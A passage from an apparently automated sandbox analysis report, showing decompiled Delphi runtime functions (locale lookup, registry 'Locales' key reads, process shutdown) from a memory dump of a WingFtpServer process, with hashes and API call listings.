                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff846075db4e42e4b64825657a59ce86cfd3611c3b8849550859a423431b274
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A0184397313A85CD630F7A55D8AAFE619E9F03754F0001FFEA54DE281D6A1594087E2
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAD584 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                                  			E03AAD584(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E03AA9D00(_v8);
				_push(_t61);
				_push(0x3aad644);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L03AA51BC();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E03AAA99C( &_v20, 4,  &_v16);
				E03AAAB4C(_t44, _v20, _v8);
				_t29 = E03AAD434( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E03AAA99C( &_v24, 4,  &_v16);
					E03AAAB4C(_t44, _v24, _v8);
					_t40 = E03AAD434( *_t44, _t44); // executed
					if(_t40 == 0) {
						E03AA9C1C(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E03AAD64B);
				E03AA9C7C( &_v24, 2);
				return E03AA9C1C( &_v8);
			}













                                                                                                                                                                                                  0x03aad58a
                                                                                                                                                                                                  0x03aad58d
                                                                                                                                                                                                  0x03aad590
                                                                                                                                                                                                  0x03aad593
                                                                                                                                                                                                  0x03aad595
                                                                                                                                                                                                  0x03aad59b
                                                                                                                                                                                                  0x03aad5a2
                                                                                                                                                                                                  0x03aad5a3
                                                                                                                                                                                                  0x03aad5a8
                                                                                                                                                                                                  0x03aad5ab
                                                                                                                                                                                                  0x03aad5b0
                                                                                                                                                                                                  0x03aad5b6
                                                                                                                                                                                                  0x03aad5bf
                                                                                                                                                                                                  0x03aad5cf
                                                                                                                                                                                                  0x03aad5dc
                                                                                                                                                                                                  0x03aad5e3
                                                                                                                                                                                                  0x03aad5ea
                                                                                                                                                                                                  0x03aad5ec
                                                                                                                                                                                                  0x03aad5fd
                                                                                                                                                                                                  0x03aad60a
                                                                                                                                                                                                  0x03aad611
                                                                                                                                                                                                  0x03aad618
                                                                                                                                                                                                  0x03aad61c
                                                                                                                                                                                                  0x03aad61c
                                                                                                                                                                                                  0x03aad618
                                                                                                                                                                                                  0x03aad623
                                                                                                                                                                                                  0x03aad626
                                                                                                                                                                                                  0x03aad629
                                                                                                                                                                                                  0x03aad636
                                                                                                                                                                                                  0x03aad643

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,03AAD644,?,?), ref: 03AAD5B6
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,03AAD644,?,?), ref: 03AAD5BF
                                                                                                                                                                                                    • Part of subcall function 03AAD434: FindFirstFileW.KERNEL32(00000000,?,00000000,03AAD492,?,?), ref: 03AAD467
                                                                                                                                                                                                    • Part of subcall function 03AAD434: FindClose.KERNEL32(00000000,00000000,?,00000000,03AAD492,?,?), ref: 03AAD477
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3216391948-0
                                                                                                                                                                                                  • Opcode ID: b753c0ef7e4fde52516693467e868cd03fb365ef7f7084980bfc3b4c5f8f08c8
                                                                                                                                                                                                  • Instruction ID: 43b0a37e1484ca914f74b95d2d97938f4a584e0e652de98e73fb4a59845e9259
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b753c0ef7e4fde52516693467e868cd03fb365ef7f7084980bfc3b4c5f8f08c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B811A275A04B09AFDF00EF9CCA91AAEF3F9EF45300F50407AA444AB350D7745E04C665
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAD434 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                                  			E03AAD434(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E03AA9D00(_v8);
				_push(_t27);
				_push(0x3aad492);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E03AAA8E4(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E03AAD499);
				return E03AA9C1C( &_v8);
			}








                                                                                                                                                                                                  0x03aad43d
                                                                                                                                                                                                  0x03aad43e
                                                                                                                                                                                                  0x03aad444
                                                                                                                                                                                                  0x03aad44b
                                                                                                                                                                                                  0x03aad44c
                                                                                                                                                                                                  0x03aad451
                                                                                                                                                                                                  0x03aad454
                                                                                                                                                                                                  0x03aad467
                                                                                                                                                                                                  0x03aad474
                                                                                                                                                                                                  0x03aad477
                                                                                                                                                                                                  0x03aad477
                                                                                                                                                                                                  0x03aad47e
                                                                                                                                                                                                  0x03aad481
                                                                                                                                                                                                  0x03aad484
                                                                                                                                                                                                  0x03aad491

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,03AAD492,?,?), ref: 03AAD467
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,03AAD492,?,?), ref: 03AAD477
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                  • Opcode ID: f066dc17f4c23b6b7cd37c802575212b843dcfd50f620f6d2b5141312eee4b0c
                                                                                                                                                                                                  • Instruction ID: baf9f298d6940b14c9f8775c1762333b45d9cab6c84c5321a5127a2c65563b69
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f066dc17f4c23b6b7cd37c802575212b843dcfd50f620f6d2b5141312eee4b0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0BE76900F08BFCB10EB7DDE5185EB3ECFB092107A085A3A844D7650EB35AE00A514
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAD058 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                                  			E03AAD058(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E03AA9D00(_v8);
				_push(_t112);
				_push(0x3aad27d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E03AAC88C( &_v542, E03AAA8E4(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L17:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E03AAD284);
					return E03AA9C1C( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x3aad260);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E03AACE68( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E03AAD370, 0, 0, 0,  &_v20) == 0) {
								_v12 = E03AA6E90(_v20);
								RegQueryValueExW(_v16, E03AAD370, 0, 0, _v12,  &_v20);
								E03AAA948(_t97, _v12);
							}
						} else {
							_v12 = E03AA6E90(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E03AAA948(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E03AAD267);
						if(_v12 != 0) {
							E03AA6EAC(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L17;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                                                                                                                                                  0x03aad059
                                                                                                                                                                                                  0x03aad05b
                                                                                                                                                                                                  0x03aad062
                                                                                                                                                                                                  0x03aad064
                                                                                                                                                                                                  0x03aad06a
                                                                                                                                                                                                  0x03aad071
                                                                                                                                                                                                  0x03aad072
                                                                                                                                                                                                  0x03aad077
                                                                                                                                                                                                  0x03aad07a
                                                                                                                                                                                                  0x03aad081
                                                                                                                                                                                                  0x03aad0ad
                                                                                                                                                                                                  0x03aad083
                                                                                                                                                                                                  0x03aad091
                                                                                                                                                                                                  0x03aad091
                                                                                                                                                                                                  0x03aad0ba
                                                                                                                                                                                                  0x03aad267
                                                                                                                                                                                                  0x03aad269
                                                                                                                                                                                                  0x03aad26c
                                                                                                                                                                                                  0x03aad26f
                                                                                                                                                                                                  0x03aad27c
                                                                                                                                                                                                  0x03aad0c0
                                                                                                                                                                                                  0x03aad0c2
                                                                                                                                                                                                  0x03aad0da
                                                                                                                                                                                                  0x03aad0e1
                                                                                                                                                                                                  0x03aad181
                                                                                                                                                                                                  0x03aad183
                                                                                                                                                                                                  0x03aad184
                                                                                                                                                                                                  0x03aad189
                                                                                                                                                                                                  0x03aad18c
                                                                                                                                                                                                  0x03aad19a
                                                                                                                                                                                                  0x03aad1bb
                                                                                                                                                                                                  0x03aad20a
                                                                                                                                                                                                  0x03aad214
                                                                                                                                                                                                  0x03aad22c
                                                                                                                                                                                                  0x03aad236
                                                                                                                                                                                                  0x03aad236
                                                                                                                                                                                                  0x03aad1bd
                                                                                                                                                                                                  0x03aad1c5
                                                                                                                                                                                                  0x03aad1df
                                                                                                                                                                                                  0x03aad1e9
                                                                                                                                                                                                  0x03aad1e9
                                                                                                                                                                                                  0x03aad23d
                                                                                                                                                                                                  0x03aad240
                                                                                                                                                                                                  0x03aad243
                                                                                                                                                                                                  0x03aad24c
                                                                                                                                                                                                  0x03aad251
                                                                                                                                                                                                  0x03aad251
                                                                                                                                                                                                  0x03aad25f
                                                                                                                                                                                                  0x03aad0e7
                                                                                                                                                                                                  0x03aad0fc
                                                                                                                                                                                                  0x03aad103
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad105
                                                                                                                                                                                                  0x03aad11a
                                                                                                                                                                                                  0x03aad121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad123
                                                                                                                                                                                                  0x03aad138
                                                                                                                                                                                                  0x03aad13f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad141
                                                                                                                                                                                                  0x03aad156
                                                                                                                                                                                                  0x03aad15d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad15f
                                                                                                                                                                                                  0x03aad174
                                                                                                                                                                                                  0x03aad17b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad17b
                                                                                                                                                                                                  0x03aad15d
                                                                                                                                                                                                  0x03aad13f
                                                                                                                                                                                                  0x03aad121
                                                                                                                                                                                                  0x03aad103
                                                                                                                                                                                                  0x03aad0e1

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03AAD27D,?,?), ref: 03AAD091
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03AAD27D,?,?), ref: 03AAD0DA
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03AAD27D,?,?), ref: 03AAD0FC
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 03AAD11A
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 03AAD138
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 03AAD156
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 03AAD174
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,03AAD260,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03AAD27D), ref: 03AAD1B4
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,03AAD260,?,80000001), ref: 03AAD1DF
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,03AAD267,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,03AAD260,?,80000001,Software\Embarcadero\Locales), ref: 03AAD25A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                                                                                                                  • API String ID: 2701450724-3496071916
                                                                                                                                                                                                  • Opcode ID: 831cb3941e19f01167091ab5fca725c3754e336d0fcbcc629f6a08be283080b5
                                                                                                                                                                                                  • Instruction ID: 5ea4909a0cb9d43b9371f2c065c845e66484b708a93f3967f84884b1dd35358f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 831cb3941e19f01167091ab5fca725c3754e336d0fcbcc629f6a08be283080b5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F851117BA80B08BEEB14DB9CCD51FAEB3BCEB09700F504066B654FB681D7709A44C655
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA9600 Relevance: 6.2, APIs: 4, Instructions: 159threadCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 44 3aa9600-3aa960d 45 3aa960f 44->45 46 3aa9614-3aa9648 GetCurrentThreadId 44->46 45->46 47 3aa964a 46->47 48 3aa964c-3aa9678 call 3aa94e4 46->48 47->48 51 3aa967a-3aa967c 48->51 52 3aa9681-3aa9688 48->52 51->52 53 3aa967e 51->53 54 3aa968a-3aa968d 52->54 55 3aa9692-3aa9698 52->55 53->52 54->55 56 3aa969a 55->56 57 3aa969d-3aa96a4 55->57 56->57 58 3aa96b3-3aa96b7 57->58 59 3aa96a6-3aa96ad 57->59 60 3aa994c-3aa9960 58->60 61 3aa96bd call 3aa9594 58->61 59->58 63 3aa9962-3aa996e call 3aa982c call 3aa98b4 60->63 64 3aa9973-3aa997a 60->64 65 3aa96c2 61->65 63->64 66 3aa997c-3aa9987 GetCurrentThreadId 64->66 67 3aa999d-3aa99a1 64->67 65->60 66->67 69 3aa9989-3aa9998 call 3aa9504 call 3aa9888 66->69 70 3aa99a3-3aa99aa 67->70 71 3aa99c5-3aa99c9 67->71 69->67 70->71 74 3aa99ac-3aa99c3 70->74 75 3aa99cb-3aa99ce 71->75 76 3aa99d5-3aa99d9 71->76 74->71 75->76 82 3aa99d0-3aa99d2 75->82 78 3aa99db-3aa99e4 call 3aa6f54 76->78 79 3aa99f8-3aa9a01 call 3aa952c 76->79 78->79 89 3aa99e6-3aa99f6 call 3aa7c70 call 3aa6f54 78->89 90 3aa9a08-3aa9a0d 79->90 91 3aa9a03-3aa9a06 79->91 82->76 89->79 93 3aa9a29-3aa9a34 call 3aa9504 90->93 94 3aa9a0f-3aa9a1d call 3aad978 90->94 91->90 91->93 102 3aa9a39-3aa9a3d 93->102 103 3aa9a36 93->103 94->93 101 3aa9a1f-3aa9a21 94->101 101->93 105 3aa9a23-3aa9a24 FreeLibrary 101->105 106 3aa9a3f-3aa9a41 call 3aa9888 102->106 107 3aa9a46-3aa9a49 102->107 103->102 105->93 106->107 109 3aa9a4b-3aa9a52 107->109 110 3aa9a62-3aa9a73 107->110 111 3aa9a5a-3aa9a5d ExitProcess 109->111 112 3aa9a54 109->112 110->71 112->111
                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E03AA9600(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _t40;
				intOrPtr* _t42;
				char _t48;
				signed int _t49;
				signed int _t50;
				void* _t59;
				void* _t62;
				intOrPtr _t70;
				intOrPtr* _t72;
				void* _t83;
				void* _t89;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t102;
				struct HINSTANCE__* _t104;
				void* _t109;
				void* _t115;
				intOrPtr _t118;
				void* _t119;
				void* _t120;

				_t102 = __edx;
				_t89 = 0x3bd5b9c;
				if( *(_t118 + 0xc) >= 2) {
					_t89 = 0x3bd5bcc;
				}
				_t115 = _t89;
				_t40 = memcpy(_t118 - 0x40, _t115, 0xc << 2);
				_t120 = _t119 + 0xc;
				_t109 = _t115 + 0x18;
				_pop( *_t4);
				_pop( *_t5);
				_pop( *_t6);
				 *((intOrPtr*)(_t89 + 0x14)) = _t118;
				 *(_t89 + 8) = _t40;
				 *((intOrPtr*)(_t89 + 0x10)) = _t102;
				 *_t89 = _t118 - 0x40;
				 *((intOrPtr*)(_t89 + 0x2c)) = GetCurrentThreadId();
				_t12 = _t89 + 8; // 0x0
				_t42 =  *_t12;
				_t96 = 0;
				if( *(_t118 + 0xc) == 0) {
					_t96 =  *_t42;
				}
				 *((intOrPtr*)(_t89 + 0xc)) = _t96;
				 *0x3bd301c = 0x3aa513c;
				 *0x3bd3020 = 0x3aa5144;
				E03AA94E4(_t89);
				_t48 =  *(_t118 + 0xc) + 1;
				 *((char*)(_t89 + 0x28)) = _t48;
				_t49 = _t48 - 1;
				_pop(_t97);
				 *((intOrPtr*)(_t89 + 0x24)) =  *_t97;
				if(_t49 != 0 && _t49 < 3) {
					 *((intOrPtr*)(_t97 + _t49 * 4))();
				}
				_push(_t97);
				_t98 =  *((intOrPtr*)(_t120 + 8));
				if(_t98 != 0) {
					 *_t98();
				}
				_pop(_t99);
				_t50 =  *(_t118 + 0xc);
				if(_t50 >= 3) {
					 *((intOrPtr*)(_t99 + _t50 * 4))();
				}
				if( *0x3bd3040 == 0) {
					 *0x3bd3048 = 1;
					asm("fnstcw word [0x3bce024]");
				}
				if( *(_t118 + 0xc) != 1) {
					_push(_t89);
					_push(_t115);
					_push(_t109);
					if( *0x3bce004 != 0) {
						E03AA982C();
						E03AA98B4(_t99);
						 *0x3bce004 = 0;
					}
					if( *0x3bd5bd0 != 0 && GetCurrentThreadId() ==  *0x3bd5bf8) {
						E03AA9504(0x3bd5bcc);
						E03AA9888(0x3bd5bcc);
					}
					if( *0x03BD5BC4 != 0 ||  *0x3bd3058 == 0) {
						L23:
						if( *((char*)(0x3bd5bc4)) == 2 &&  *0x3bce000 == 0) {
							 *0x03BD5BA8 = 0;
						}
						if( *((char*)(0x3bd5bc4)) != 0) {
							L29:
							E03AA952C();
							if( *((char*)(0x3bd5bc4)) <= 1 ||  *0x3bce000 != 0) {
								_t54 =  *0x03BD5BAC;
								if( *0x03BD5BAC != 0) {
									E03AAD978(_t54);
									_t70 =  *((intOrPtr*)(0x3bd5bac));
									_t104 =  *(_t70 + 0x10);
									if(_t104 !=  *((intOrPtr*)(_t70 + 4)) && _t104 != 0) {
										FreeLibrary(_t104);
									}
								}
							}
							E03AA9504(0x3bd5b9c);
							if( *((char*)(0x3bd5bc4)) == 1) {
								 *0x03BD5BC0();
							}
							if( *((char*)(0x3bd5bc4)) != 0) {
								E03AA9888(0x3bd5b9c);
							}
							if( *0x3bd5b9c == 0) {
								if( *0x3bd3038 != 0) {
									 *0x3bd3038();
								}
								ExitProcess( *0x3bce000);
							}
							memcpy(0x3bd5b9c,  *0x3bd5b9c, 0xc << 2);
							_t120 = _t120 + 0xc;
							0x3bce000 = 0x3bce000;
							0x3bd5b9c = 0x3bd5b9c;
							goto L23;
						} else {
							_t59 = E03AA6F54();
							_t90 = _t59;
							if(_t59 == 0) {
								goto L29;
							} else {
								goto L28;
							}
							do {
								L28:
								E03AA7C70(_t90);
								_t62 = E03AA6F54();
								_t90 = _t62;
							} while (_t62 != 0);
							goto L29;
						}
					} else {
						do {
							_t72 =  *0x3bd3058; // 0x0
							 *0x3bd3058 = 0;
							 *_t72();
						} while ( *0x3bd3058 != 0);
						L23:
						while(1) {
						}
					}
				} else {
					_t83 = E03AA9594(); // executed
					return _t83;
				}
			}

























                                                                                                                                                                                                  0x03aa9600
                                                                                                                                                                                                  0x03aa9604
                                                                                                                                                                                                  0x03aa960d
                                                                                                                                                                                                  0x03aa960f
                                                                                                                                                                                                  0x03aa960f
                                                                                                                                                                                                  0x03aa9614
                                                                                                                                                                                                  0x03aa961e
                                                                                                                                                                                                  0x03aa961e
                                                                                                                                                                                                  0x03aa961e
                                                                                                                                                                                                  0x03aa9620
                                                                                                                                                                                                  0x03aa9623
                                                                                                                                                                                                  0x03aa9626
                                                                                                                                                                                                  0x03aa9629
                                                                                                                                                                                                  0x03aa962c
                                                                                                                                                                                                  0x03aa962f
                                                                                                                                                                                                  0x03aa9635
                                                                                                                                                                                                  0x03aa963c
                                                                                                                                                                                                  0x03aa963f
                                                                                                                                                                                                  0x03aa963f
                                                                                                                                                                                                  0x03aa9642
                                                                                                                                                                                                  0x03aa9648
                                                                                                                                                                                                  0x03aa964a
                                                                                                                                                                                                  0x03aa964a
                                                                                                                                                                                                  0x03aa964c
                                                                                                                                                                                                  0x03aa9654
                                                                                                                                                                                                  0x03aa965e
                                                                                                                                                                                                  0x03aa9665
                                                                                                                                                                                                  0x03aa966d
                                                                                                                                                                                                  0x03aa966e
                                                                                                                                                                                                  0x03aa9671
                                                                                                                                                                                                  0x03aa9672
                                                                                                                                                                                                  0x03aa9675
                                                                                                                                                                                                  0x03aa9678
                                                                                                                                                                                                  0x03aa967e
                                                                                                                                                                                                  0x03aa967e
                                                                                                                                                                                                  0x03aa9681
                                                                                                                                                                                                  0x03aa9682
                                                                                                                                                                                                  0x03aa9688
                                                                                                                                                                                                  0x03aa9690
                                                                                                                                                                                                  0x03aa9690
